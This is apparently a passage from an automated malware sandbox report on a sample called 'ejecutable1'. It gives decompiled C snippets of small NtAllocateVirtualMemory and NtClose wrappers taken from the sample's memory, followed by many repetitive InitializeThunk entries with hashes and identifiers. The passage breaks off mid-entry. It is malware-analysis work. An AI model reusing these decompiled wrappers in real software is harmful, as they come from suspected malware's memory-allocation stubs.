                                                                    • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004187B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 296 4187b0-4187c6 297 4187cc-4187ed NtAllocateVirtualMemory 296->297 298 4187c7 call 4191d0 296->298 298->297
                                                                    C-Code - Quality: 100%
                                                                    			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0x8bec97b5
				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                    0x004187bf
                                                                    0x004187c7
                                                                    0x004187e9
                                                                    0x004187ed

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004187AA, Relevance: 1.5, APIs: 1, Instructions: 28memorynativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 299 4187aa-4187ed call 4191d0 NtAllocateVirtualMemory
                                                                    C-Code - Quality: 79%
                                                                    			E004187AA(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				void* _t22;

				_t11 = _a4;
				_push(0xc73fa1d4);
				_t3 = _t11 + 0xc60; // 0x8bec97b5
				E004191D0(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}





                                                                    0x004187b3
                                                                    0x004187b9
                                                                    0x004187bf
                                                                    0x004187c7
                                                                    0x004187e9
                                                                    0x004187ed

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: bdf474fc00807c62b8a81943fbc1735e4ac1a6dad9ecc420056a1c15aeebe8c7
                                                                    • Instruction ID: 9f18913c34982a5a24f240f689ab26c97c0e9d0139fd41c8860d9d59ddfd995b
                                                                    • Opcode Fuzzy Hash: bdf474fc00807c62b8a81943fbc1735e4ac1a6dad9ecc420056a1c15aeebe8c7
                                                                    • Instruction Fuzzy Hash: F7F030B51041496BCB14DF98DC84CA777A9BF88254B15868DFD4C97202C234EC55CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004186FA, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004186FA(void* __ecx, void* __edi, void* _a4) {
				intOrPtr _v0;
				long _t10;
				void* _t21;

				 *((intOrPtr*)(__edi + 0x55708ccb)) =  *((intOrPtr*)(__edi + 0x55708ccb)) + _t21;
				_t7 = _v0;
				_t4 = _t7 + 0x10; // 0x300
				_t5 = _t7 + 0xc50; // 0x409753
				E004191D0(__edi, _v0, _t5,  *_t4, 0, 0x2c);
				_t10 = NtClose(_a4); // executed
				return _t10;
			}






                                                                    0x004186fb
                                                                    0x00418703
                                                                    0x00418706
                                                                    0x0041870f
                                                                    0x00418717
                                                                    0x00418725
                                                                    0x00418729

                                                                    APIs
                                                                    • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 6ad741b659345e5b263686d54fd2c7e4e0509bd277aa89ea0b5f1953d09f1899
                                                                    • Instruction ID: 2f4c18f98c9d2f34f70f130a40185be8465225ee33dfa39a4fb647e3a91c4c75
                                                                    • Opcode Fuzzy Hash: 6ad741b659345e5b263686d54fd2c7e4e0509bd277aa89ea0b5f1953d09f1899
                                                                    • Instruction Fuzzy Hash: 0DE08C71240304BBE714EB98CC4AED777A8EF48760F04409AFA089B242C634FA008AE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00418700(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                    0x00418703
                                                                    0x00418706
                                                                    0x0041870f
                                                                    0x00418717
                                                                    0x00418725
                                                                    0x00418729

                                                                    APIs
                                                                    • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 008900C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00890048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00890078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0088F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0088F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0088FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0088FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0088FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0088FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0088FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0088FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0088FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0088FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
